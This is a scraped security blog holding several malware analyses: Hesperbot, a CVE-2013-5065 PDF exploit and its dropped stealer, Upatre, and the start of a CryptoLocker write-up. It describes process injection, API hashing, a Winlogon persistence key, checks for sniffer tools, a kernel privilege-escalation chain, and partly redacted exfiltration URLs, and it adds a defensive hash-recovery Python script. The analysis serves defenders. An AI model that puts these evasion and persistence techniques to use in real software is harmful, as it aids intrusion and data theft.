<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFiD6E5iKnsCjrGkuybkjb2SUuZM7zQQgrsHRnwkrsc67g53N8N3t78BKHrG3R6_-98nWgnR1QH69yr8pcwrFY9GF_iutgtQAo8LREM0hN1AdM0JvBjsRRUnQq-XifO2Z07e6HetXX/s1600/RandomDomains.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFiD6E5iKnsCjrGkuybkjb2SUuZM7zQQgrsHRnwkrsc67g53N8N3t78BKHrG3R6_-98nWgnR1QH69yr8pcwrFY9GF_iutgtQAo8LREM0hN1AdM0JvBjsRRUnQq-XifO2Z07e6HetXX/s320/RandomDomains.png" /></a><br />
<br />
It will then send the following information after a successful connection handshake is established:<br />
<br />
<ul>
<li>Computer name, which serves as the ID of the infected machine, e.g. "WINXP-6F60CDCD2A3429D85B855BF7"</li>
<li>Bot name “tr-botnet”</li>
<li>Network adapter information such as adapter name, IP address, gateway, DHCP server, etc.</li>
<li>Installed smart cards, enumerated using SCardEstablishContext, SCardListReadersW and SCardConnectW</li>
</ul>
<br />
<div>
This Trojan supposedly downloads other malicious modules from its control server, such as a keylogger, screen recorder, Virtual Network Computing (VNC) module, network traffic interceptor, etc. However, as of this writing, its control servers seem to have been taken down already and are not responding.</div>
<br />
<h3>
Conclusion</h3>
Reverse engineering the Hesperbot core is quite fascinating. It has numerous tricks up its sleeve to elude easy detection by most antivirus vendors: hashing of process names and needed APIs, encrypting and decrypting parts of its code in memory, and generating random domain names when connecting to its command-and-control server.<br />
<br />
It also demonstrates three process injection techniques: (1) CreateProcess-ResumeThread, (2) CreateRemoteThread, and (3) exploiting the window messaging vulnerability using the FindWindow-“shell_traywnd” – SetWindowLong trick.<br />
<br />
<div style="text-align: right;">
<i><b>Christopher D. Del Fierro</b></i></div>
<br />
<h3>
PDF CVE-2013-5065 - Dropped BAD Malware</h3>
Published 2013-12-06.<br />
This malware was definitely created by a professional, as it has an advanced method of installing itself. And the malware author knows that what he or she created is BAD.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyZQZ85dFgeH9bRNc82H-PdcxXnys3ZJd9a_kNjUTgWE2fcWB3VR-7ff6cH-zaBsxy8P8zp7vNl9kaCqb2zrl8vhSAAMyAbkOoBWSnV1ldmEiNivOqzh-etNX6yREQqMrm1YKwuIdRqvLd/s1600/bad_signature.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyZQZ85dFgeH9bRNc82H-PdcxXnys3ZJd9a_kNjUTgWE2fcWB3VR-7ff6cH-zaBsxy8P8zp7vNl9kaCqb2zrl8vhSAAMyAbkOoBWSnV1ldmEiNivOqzh-etNX6yREQqMrm1YKwuIdRqvLd/s400/bad_signature.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i>0x0BAD - Signature of ShellCode for data stealing.</i></div>
<br />
<b>Installation</b><br />
<br />
This malware was dropped by a <a href="http://www.antimalwarelab.com/2013/12/cve-2013-5065-pdf-exploit.html">PDF file</a> that takes advantage of a <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5065">known vulnerability</a> resulting in privilege escalation. To maintain its privilege to run as admin, it creates the following autostart key:<br />
<br />
Software\Microsoft\Windows NT\Currentversion\Winlogon<br />
Shell="explorer.exe, &lt;malware_path_and_filename&gt;"<br />
<br />
This malware injects its code into the Windows taskbar by searching for the Shell_TrayWnd window handle. It also uses ZwQuerySystemInformation to enumerate all running processes and calculates a hash of each process name. The hashes are then compared against a hardcoded list of hashes of the executables targeted for code injection. Here are the targeted executables and their corresponding hashes:<br />
<br />
69CD16BA - iexplore.exe<br />
7B6061F9 - firefox.exe<br />
880F19D2 - chrome.exe<br />
DD87014F - opera.exe<br />
74667F89 - explorer.exe<br />
<br />
This malware uses hashes instead of storing the names of the APIs it needs. It starts from the TIB (FS:[0x18]) to enumerate the loaded DLL modules. Below is the list of APIs and their corresponding hashes:<br />
<br />
1F8B758A - ntdll.dll<br />
B05FD69A - LdrGetDllHandle<br />
CCE8D5E4 - LdrLoadDll<br />
FBAF20FE - ZwSetInformationThread<br />
F84E6809 - ZwResumeThread<br />
251E0CC9 - ZwDelayExecution<br />
17CF5544 - RtlGetProcessHeaps<br />
9B2E0E85 - RtlAllocateHeap<br />
41324137 - ZwQuerySystemInformation<br />
086A61AC - RtlReAllocateHeap<br />
E4A0A8C0 - RtlFreeHeap<br />
CD74BF79 - ZwOpenProcess<br />
309A4C54 - ZwClose<br />
73ED9B27 - ZwCreateSection<br />
5D859023 - ZwMapViewOfSection<br />
B62E0ECD - _snprintf<br />
6828791B - ZwTerminateThread<br />
0301DA7D - RtlDecompressBuffer<br />
CE8286AD - ZwAllocateVirtualMemory<br />
<br />
4F515588 - kernel32.dll<br />
1A08B014 - CreateRemoteThread<br />
C3B42C10 - GetModuleFileNameW<br />
98D29F2E - GetModuleFileNameA<br />
63A4DEA5 - GetShortPathNameW<br />
412E83B3 - GetShortPathNameA<br />
EB771CAF - CreateEventA<br />
F6F15646 - ExpandEnvironmentStringsA<br />
438EED48 - CloseHandle<br />
A01B4F40 - GetFileAttributesA<br />
69FB2CCE - GetFileAttributesW<br />
5568AE6B - CreateFileA<br />
DC0BC10F - WriteFile<br />
534D310F - ExitProcess<br />
2415842C - DeleteFileW<br />
7DC71262 - DeleteFileA<br />
293DF8B5 - GetProcessVersion<br />
<br />
5B117232 - advapi32.dll<br />
E4A8B4E0 - OpenProcessToken<br />
3B97B437 - GetTokenInformation<br />
5B1D4476 - EqualSid<br />
1A726DBB - DuplicateTokenEx<br />
F5E6C455 - RegCreateKeyExA<br />
A63ACEB9 - RegSetValueExA<br />
8F2D0F57 - RegCloseKey<br />
<br />
5A4B3EDE - user32.dll<br />
8FAFF46C - FindWindowA<br />
D69D869A - PostMessageA<br />
71669709 - SetWindowLongA<br />
<br />
69DE0153 - shell32.dll<br />
F955B5FA - ShellExecuteA<br />
<br />
69304E4B - ole32.dll<br />
5142539F - CoCreateGuid<br />
<br />
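A dictionary-style recovery of hashed names, as an added Python example that is not part of either post: both the Hesperbot core (the process-name table and API hashes above) and this dropper compare hashes rather than strings, and the analyst recovers the names by hashing candidate strings and looking for matches. Neither post discloses the real hash routine, so hash_name() below is a hypothetical ROR-13 stand-in and its values will not reproduce the hashes listed on this page.<br />

```python
"""Recover process/API/DLL names behind 32-bit hashes by dictionary matching.

Added example, not code from the posts or the malware. hash_name() is a
hypothetical ROR-13 stand-in: the page does not disclose either family's real
hash routine, so the values computed here will not match the tables above.
"""
from typing import Callable, Dict, Iterable, List, Set, Tuple

HashFn = Callable[[str], int]

# Constructed wordlist: names that appear in the posts' tables, plus one extra
# browser (safari.exe) of the kind an analyst would normally throw in.
CANDIDATE_NAMES = [
    "explorer.exe", "csrss.exe", "svchost.exe", "iexplore.exe", "firefox.exe",
    "chrome.exe", "opera.exe", "safari.exe", "maxthon.exe", "seamonkey.exe",
    "ntdll.dll", "kernel32.dll", "user32.dll", "advapi32.dll",
    "CreateRemoteThread", "ZwResumeThread", "FindWindowA", "SetWindowLongA",
]


def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def hash_name(name: str) -> int:
    """Hypothetical stand-in: rotate-right-13 accumulate over the ASCII bytes."""
    h = 0
    for b in name.encode("ascii"):
        h = (ror32(h, 13) + b) & 0xFFFFFFFF
    return h


def build_dictionary(candidates: Iterable[str],
                     hash_fn: HashFn = hash_name) -> Dict[int, Set[str]]:
    """Map hash -> candidate strings producing it.

    Lower- and upper-case variants are included because malware often
    normalises the filename before hashing, and the analyst does not know
    which form was used until a hit shows up.
    """
    table: Dict[int, Set[str]] = {}
    for name in candidates:
        for variant in {name, name.lower(), name.upper()}:
            table.setdefault(hash_fn(variant), set()).add(variant)
    return table


def recover_names(hashes: Iterable[int], candidates: Iterable[str],
                  hash_fn: HashFn = hash_name) -> Tuple[Dict[int, List[str]], List[int]]:
    """Return (resolved, unresolved).

    resolved maps each matched hash to every candidate that produced it, so a
    collision is reported instead of silently picking one name; unresolved
    lists the hashes with no dictionary hit (the 'near impossible' remainder
    the Hesperbot post talks about).
    """
    dictionary = build_dictionary(candidates, hash_fn)
    resolved: Dict[int, List[str]] = {}
    unresolved: List[int] = []
    for h in hashes:
        hits = dictionary.get(h)
        if hits:
            resolved[h] = sorted(hits)
        else:
            unresolved.append(h)
    return resolved, sorted(unresolved)


if __name__ == "__main__":
    # Constructed table: two hashes the wordlist can recover (one from an
    # upper-cased name) and one that is not in the wordlist at all.
    table = [hash_name("chrome.exe"), hash_name("OPERA.EXE"), 0xDEADBEEF]
    found, missing = recover_names(table, CANDIDATE_NAMES)
    for h in table:
        print("0x%08X -> %s" % (h, ", ".join(found.get(h, ["<unresolved>"]))))
    print("unresolved:", ["0x%08X" % h for h in missing])
```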
<br />
<b>Information Stealing</b><br />
<br />
This malware has the following capabilities:<br />
<br />
Delete files<br />
Download and execute files<br />
Send stolen data to server<br />
Stop its own process<br />
<br />
But the above routines will not get executed if the following network monitoring tools are running:<br />
<br />
tcpdump.exe<br />
windump.exe<br />
ethereal.exe <br />
wireshark.exe <br />
ettercap.exe <br />
snoop.exe <br />
dsniff.exe<br />
<br />
It steals the following information from a compromised machine:<br />
<br />
Uptime of the machine<br />
Temp folder<br />
File listing on certain directory<br />
Drive Types<br />
Network Resources<br />
TCP and UDP connection table<br />
List of running processes<br />
List of names of open windows<br />
Machine Information (Manufacturer and Model)<br />
Operating System version<br />
Processor Information<br />
Computer Name<br />
Local Group<br />
Local Users<br />
Language<br />
Timezone<br />
Country<br />
Installed Windows Updates<br />
<br />
It then collates and encrypts the above-mentioned data before sending it to the following sites via HTTP POST requests:<br />
<br />
http://{REMOVED}play.com/wp-includes/sitemap/?rank=78964<br />
http://{REMOVED}ree.ir/wp-content/plugins/online-chat/?rank=87758<br />
<br />
<br />
<br />
<h3>
New PDF Exploit uses 2 new vulns + JJencode</h3>
Published 2013-12-05.<br />
<div style="text-align: justify;">
Last week, a new zero-day exploit was found in the wild. It targets a vulnerability that allows attackers to escalate privileges and execute code in kernel (ring 0) mode. More details on the CVE-2013-5065 vulnerability can be found on this Microsoft <a href="http://technet.microsoft.com/en-us/security/advisory/2914486" target="_blank">website</a>. After we got a sample of the PDF supposedly used in the targeted attack, we immediately went to work, and here's what we found.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI8d1XKjZW83tv0FjYIaOIsfYecz8LNRBHr543S48BHkTIzuh6aOLI0-oiEOvoBv8cRs-NKrIUs2Mrq9ru34qQBAPrExpouVnu7aGmu5ieODh1HVzFi-Y6zUsL4FtT_u70x3ZMii9Xko0/s1600/jjencodescript.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI8d1XKjZW83tv0FjYIaOIsfYecz8LNRBHr543S48BHkTIzuh6aOLI0-oiEOvoBv8cRs-NKrIUs2Mrq9ru34qQBAPrExpouVnu7aGmu5ieODh1HVzFi-Y6zUsL4FtT_u70x3ZMii9Xko0/s200/jjencodescript.jpg" width="200" /></a></div>
<br />
<div style="text-align: justify;">
Close inspection of the raw file reveals a strange-looking script at the end of its body. At first glance there is no clue as to what this script does. However, one of our colleagues pointed out that this obfuscation technique is already widely used by malicious scripts and has been around for some time. The obfuscation itself is not malicious, but since it provides the stealth and complexity that most malicious scripts require, it is favored by many malware authors. This obfuscation is called jjencode. More details about this technique can be found on this <a href="http://www.martani.net/2010/10/jjencode-new-way-to-obfuscate.html" target="_blank">blog</a>. De-obfuscating it was a trivial matter, and it can easily be seen that the script contains shellcode intended to be executed using the exploitation technique ROP (return oriented programming).<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGXzlwbCRYWwjBzeUG2Kp0e5brejbwK3eIaFOwCXE7k5vK2lOXKPRrdAUsGlJg_oYSmgXrGgg5ge-zdZm2QTgDPdz9l58IzQLpNWYuvI053VeVMobL7sEEUPvrnMdM41HhA9ryZJk2Xs0/s1600/script.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGXzlwbCRYWwjBzeUG2Kp0e5brejbwK3eIaFOwCXE7k5vK2lOXKPRrdAUsGlJg_oYSmgXrGgg5ge-zdZm2QTgDPdz9l58IzQLpNWYuvI053VeVMobL7sEEUPvrnMdM41HhA9ryZJk2Xs0/s320/script.jpg" width="320" /></a></div>
</div>
<div style="text-align: center;">
<i>De-obfuscated script</i></div>
<br />
<div style="text-align: justify;">
The thing is, the supposed exploit code that escalates privileges via DeviceIoControl cannot be seen in the script itself; it is probably contained in the shellcode. And to get that shellcode running in the first place, another exploit in the PDF is required. So in theory, this PDF malware needs two exploits to successfully attack the system. Knowing this, we went ahead, analyzed the PDF and set breakpoints at strategic places to catch its shellcode in action.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqwEVjw5Y5HGs72tyoWSge-TrCLR48yrhvlVMHcRCQGaqWnO_3tWUfeR9FuZ3kXikTQGcN23tKJyhvtL3oukjrqKoQMVBgg9v5rsITUbowuAdEm4QqtRvtHzfydOPitvVwa40Dfhyphenhyphend6eg/s1600/initialshell.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqwEVjw5Y5HGs72tyoWSge-TrCLR48yrhvlVMHcRCQGaqWnO_3tWUfeR9FuZ3kXikTQGcN23tKJyhvtL3oukjrqKoQMVBgg9v5rsITUbowuAdEm4QqtRvtHzfydOPitvVwa40Dfhyphenhyphend6eg/s400/initialshell.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>ROP in action</i></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: justify;">
The picture above shows that the script has managed to place its shellcode in memory and has already gained control of the call stack. It uses a technique called ROP (return oriented programming), since a plain buffer overflow would not work in this region of memory, where security protections are in place.</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFO2YK3riK5N3RmPqycYDSNU3X7pjdWQafp9Ay_FKAXszl28PkJlxM2GfCEyqhJqK6b_DKITU8NG9O2bFrLDyBPOOgvY3_omyQImRSdtOA4occMeMJrPuvLtFr0CQZXSVtKpT_ni5_B40/s1600/createfilemap.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFO2YK3riK5N3RmPqycYDSNU3X7pjdWQafp9Ay_FKAXszl28PkJlxM2GfCEyqhJqK6b_DKITU8NG9O2bFrLDyBPOOgvY3_omyQImRSdtOA4occMeMJrPuvLtFr0CQZXSVtKpT_ni5_B40/s400/createfilemap.jpg" width="400" /></a></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<i> Allocates memory using CreateFileMapping with FFFFFFFF handle</i><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9JdR2HAw2xGBeFZUJ26CKeAKBT6E8aDhSCIGfUTzaN2ebLDmsFTFmild8ObLzQ8G1Asf7qOfWCpPKtHo9FLcu_1NjWvXPS2dmV_iE_ZOW-rmToly13JNuoJor0OReobqk6qQWAXEZgdc/s1600/memcopy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9JdR2HAw2xGBeFZUJ26CKeAKBT6E8aDhSCIGfUTzaN2ebLDmsFTFmild8ObLzQ8G1Asf7qOfWCpPKtHo9FLcu_1NjWvXPS2dmV_iE_ZOW-rmToly13JNuoJor0OReobqk6qQWAXEZgdc/s400/memcopy.jpg" width="400" /></a></div>
<i> Copies <b>0x400</b> bytes of shellcode in newly allocated memory</i></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: justify;">
It relies on a specific DLL for its API calls and, using CreateFileMapping, allocates a separate memory region in which it continues the bulk of its shellcode. Once it has copied its shellcode into the new memory, it resolves the APIs it needs using hashes.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWMGGjx1DbWYJJH894I1pVRJF1CymdZ87p01X4HllOh6OP1N9XB7yYXFbxq8xeOFi7Kc89rYXMVKAhDXxNfnDt9JDhORhu0iVI2ynyFTHlAc6-sFGBXoGu0msqIDMvPvMbrU9B02kFGQ0/s1600/hashAPI.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWMGGjx1DbWYJJH894I1pVRJF1CymdZ87p01X4HllOh6OP1N9XB7yYXFbxq8xeOFi7Kc89rYXMVKAhDXxNfnDt9JDhORhu0iVI2ynyFTHlAc6-sFGBXoGu0msqIDMvPvMbrU9B02kFGQ0/s400/hashAPI.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>Comparison of hashes for needed API</i></div>
<br />
<br />
<ul>
<li>ExitProcess</li>
<li>VirtualAlloc</li>
<li>DeviceIoControl</li>
<li>CreateFileA</li>
<li>GetCurrentProcessId</li>
<li>LoadLibraryA</li>
<li>WinExec</li>
<li>WriteFile</li>
<li>CloseHandle</li>
<li>GetTempPathA</li>
<li>GetTempFileNameA</li>
<li>GetFileSize</li>
<li>ReadFile</li>
<li>SetFilePointer</li>
</ul>
<div style="text-align: justify;">
The picture below shows the shellcode attempting to invoke CreateFileA with the given argument. The buffer should point to the string "\\\\.\\NDProxy"; a successful call returns a device handle, and a subsequent DeviceIoControl call on that handle is what performs the EoP (Escalation of Privilege) exploit. In turn, this would allow the code to execute a dropped executable with a TMP extension in the %TEMP% folder. However, as you may have noticed, the initial code only copied 0x400 bytes of its code into the new memory, while the buffer pointer passed to CreateFileA indicates the string is located at offset 0x40e, beyond the copied region... </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6gW-IVDPpXEi0kySgh7-XKI9RYLlZzdZLjCmmzGp2yUIhsTglQiX1AJjcCYiWwtbQ0PA03Z_gqmHtjVDx_hMvm5yumg_VqnbeSrfsWxAIsv4B6eUgDfaL6s7ML1-DK-4b8PsTIN65yQk/s1600/createfile.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6gW-IVDPpXEi0kySgh7-XKI9RYLlZzdZLjCmmzGp2yUIhsTglQiX1AJjcCYiWwtbQ0PA03Z_gqmHtjVDx_hMvm5yumg_VqnbeSrfsWxAIsv4B6eUgDfaL6s7ML1-DK-4b8PsTIN65yQk/s400/createfile.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>CreateFileA where buffer should point to "\\\\.\\NDProxy"</i></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUzN0ksPkLvaaSu53H1kUPuNGM5hrf2V8dD75wDTRB1tgQc3f7n1CdD3oYwS6nDwWgmlhmzKrIgZbFxMBLYoTyInBd91vnsR06SD8q3_YZJ_xD2-9ez3EWTBU78CTYqvgqXXYJVeE78zI/s1600/device.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUzN0ksPkLvaaSu53H1kUPuNGM5hrf2V8dD75wDTRB1tgQc3f7n1CdD3oYwS6nDwWgmlhmzKrIgZbFxMBLYoTyInBd91vnsR06SD8q3_YZJ_xD2-9ez3EWTBU78CTYqvgqXXYJVeE78zI/s400/device.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>DeviceIoControl with the right arguments should perform EoP</i></div>
<br />
<br />
It will then re-create an executable by decrypting it from the body of the malicious PDF.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj83phFLh2dn6pstb7weAMMeYR1jp6HqrVPey_PNx97tXdXRq_oKHrCpMH_VOCp927_5wexO5GjJhb27YC7I3KTw4G1k32iOyhj2JI-hzPat_0fvCF5wIDjiANkAmOs2_TDC7lkf6S0MiE/s1600/decryptingMZ.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj83phFLh2dn6pstb7weAMMeYR1jp6HqrVPey_PNx97tXdXRq_oKHrCpMH_VOCp927_5wexO5GjJhb27YC7I3KTw4G1k32iOyhj2JI-hzPat_0fvCF5wIDjiANkAmOs2_TDC7lkf6S0MiE/s400/decryptingMZ.jpg" width="352" /></a></div>
<div style="text-align: center;">
<i>Decrypting</i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpZWzPTErfJRx7-tweagFf5YPukPNpd4xw1Pyn5UAlGlZfcbyXu9uNDYgJ8olKkgVzpNLo2D7uAo5cJbd8ARQvUe-0ea9UtcMJ6BWvs47ZCJp6VIXp9tdXwIEOomSfwG0irEdIUbfa08/s1600/tempfile.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpZWzPTErfJRx7-tweagFf5YPukPNpd4xw1Pyn5UAlGlZfcbyXu9uNDYgJ8olKkgVzpNLo2D7uAo5cJbd8ARQvUe-0ea9UtcMJ6BWvs47ZCJp6VIXp9tdXwIEOomSfwG0irEdIUbfa08/s400/tempfile.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>Drops a TMP file in TEMP folder</i></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAap3rWmqfXhAAsXeXPUYVkPvrS3lMgdZCQrSWwpBhMMyG1fZtD_sxox4XaMRM0EtT2jEbSPqc6IFF9TC8E9AqsM3BE_uauiEKOAKpTTqdCT78TnL05DuBdsjobwy_tLFVq6L7DUxU7NY/s1600/winexec.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAap3rWmqfXhAAsXeXPUYVkPvrS3lMgdZCQrSWwpBhMMyG1fZtD_sxox4XaMRM0EtT2jEbSPqc6IFF9TC8E9AqsM3BE_uauiEKOAKpTTqdCT78TnL05DuBdsjobwy_tLFVq6L7DUxU7NY/s400/winexec.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>If everything went right, executes a file in kernel mode</i></div>
<br />
<br />Anonymoushttp://www.blogger.com/profile/15262957865496243491noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-75147889566029527122013-11-18T07:50:00.003-08:002013-11-18T07:50:57.423-08:00Upatre - Zbot downloader in a SpamThis trojan comes as a spam email. Here are sample spam emails:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-oU0Jj6KsZg-bRvIRmHRYc4Xp2Ctv7cq64BekjYuxxgWz2qGWRuCi6ngHFhrs4C-7TnrUBWKpVNWr0bQaK8ufGBEVLVFuSkJekgklNEhf1mDf7vxjkcX2s9PcWyWzkIB79GAhdmmZ1Dnv/s1600/email1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-oU0Jj6KsZg-bRvIRmHRYc4Xp2Ctv7cq64BekjYuxxgWz2qGWRuCi6ngHFhrs4C-7TnrUBWKpVNWr0bQaK8ufGBEVLVFuSkJekgklNEhf1mDf7vxjkcX2s9PcWyWzkIB79GAhdmmZ1Dnv/s400/email1.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYPsJXpGGhh9D-R7xSMDxFaeYMWF3qhTmp9VuJLGv2D0ioMwDOQj8wp7WsOL7wVqRouU-PBMazC-aXOjNf_OvZMQJ0mp-_Ti-bLMwoRx4TrIdrmI-euvXzdqPz4BCTBzCZ5jZUrvhBTSZR/s1600/email2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYPsJXpGGhh9D-R7xSMDxFaeYMWF3qhTmp9VuJLGv2D0ioMwDOQj8wp7WsOL7wVqRouU-PBMazC-aXOjNf_OvZMQJ0mp-_Ti-bLMwoRx4TrIdrmI-euvXzdqPz4BCTBzCZ5jZUrvhBTSZR/s400/email2.PNG" width="400" /></a></div>
<br />
This trojan uses a decryption method very similar to that of some <a href="http://www.antimalwarelab.com/2013/11/cryptolocker-ransomware.html">CryptoLocker</a> samples. It calls VirtualAlloc to allocate memory in which it decrypts the embedded PE image, then calls VirtualProtect so that it can overwrite itself with the newly decrypted PE image, and finally passes control to it.<br />
<br />
Here's a visual infection flow of this trojan:<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5nMbozk9rqk5iFvZDUjx_tGVZ8K4dptXAsoglwVB7w-7dwzQ-LUg8sMP-qFTTzNOo_xgYBnZI9s8TbQG0-Z-U9ZhCxpgcKYJ6D69LriJMH9kdGWNbj0GdNTdWEaKQKiWdLfaS_gzg2ruI/s1600/infectionflow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5nMbozk9rqk5iFvZDUjx_tGVZ8K4dptXAsoglwVB7w-7dwzQ-LUg8sMP-qFTTzNOo_xgYBnZI9s8TbQG0-Z-U9ZhCxpgcKYJ6D69LriJMH9kdGWNbj0GdNTdWEaKQKiWdLfaS_gzg2ruI/s400/infectionflow.png" width="400" /></a></div>
<br />
<br />
This particular sample that I got to reverse has an interesting anti-debugging technique built on RegisterClass and CreateWindowEx. It first calls RegisterClass to set up a WNDCLASS structure that contains the address to which execution continues once CreateWindowEx is called.<br />
<br />
Once the new PE image has been decrypted and given control, it creates a file named "budha.exe" in the %TEMP% folder. This file is a copy of the original binary, which it then executes using ShellExecute.<br />
<br />
This new process deletes the original binary and then attempts to download and execute files from compromised sites that are hard-coded in its body. The files it downloads are known to be Zbot variants.Anonymoushttp://www.blogger.com/profile/09301814992710231875noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-57824082585348829332013-11-17T22:13:00.003-08:002013-11-18T00:04:17.622-08:00CryptoLocker - a Ransomware<b>What is a Ransomware?</b><br />
Ransomware is a malicious program that encrypts the document, picture and movie files on a computer. To be able to decrypt them, the user must pay the malware author a sum of money.<br />
<br />
<b>CryptoLocker</b><br />
Once executed, this ransomware searches for the document files it targets and encrypts them using an RSA algorithm. The user may pay USD300 to the malware author to recover the encrypted documents; it offers the user a choice of payment methods (i.e. MoneyPak and Bitcoin). If the user chooses not to pay, his/her only practical option is to restore from backup.<br />
<br />
<b>Physical File Analysis</b><br />
The sample that I've come across has a green circular icon with a cross inside it and with the following file properties.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEiXVi59uWUtJYzsEMMBwlMtBnxjEgm-PMwO1VrhtgjZWq4oe5T97k1DDlDnWF2GtyXdZsx0MreHixeg6x6jnuawb2muo-e3FITjlrkMGbY7YFJYAD0BnL5uikc7KgwDC67ZD8-LveAgpO/s1600/file_properties.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEiXVi59uWUtJYzsEMMBwlMtBnxjEgm-PMwO1VrhtgjZWq4oe5T97k1DDlDnWF2GtyXdZsx0MreHixeg6x6jnuawb2muo-e3FITjlrkMGbY7YFJYAD0BnL5uikc7KgwDC67ZD8-LveAgpO/s320/file_properties.PNG" width="233" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<b>The Fun Part (Code Analysis)</b><br />
I used a combination of OllyDbg and IDA Pro to reverse this malware. The reason is that OllyDbg lacks the compiler symbols that IDA Pro is rich in: OllyDbg 2.0 doesn't resolve the WinMain of this sample, but IDA Pro does. Still, I used OllyDbg throughout the debugging as I am comfortable with its 'look and feel'.<br />
<br />
This malware is literally self-modifying: it carries an encrypted PE file embedded in its body, and the decrypted PE image overwrites the original binary. OllyDbg is able to detect it:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
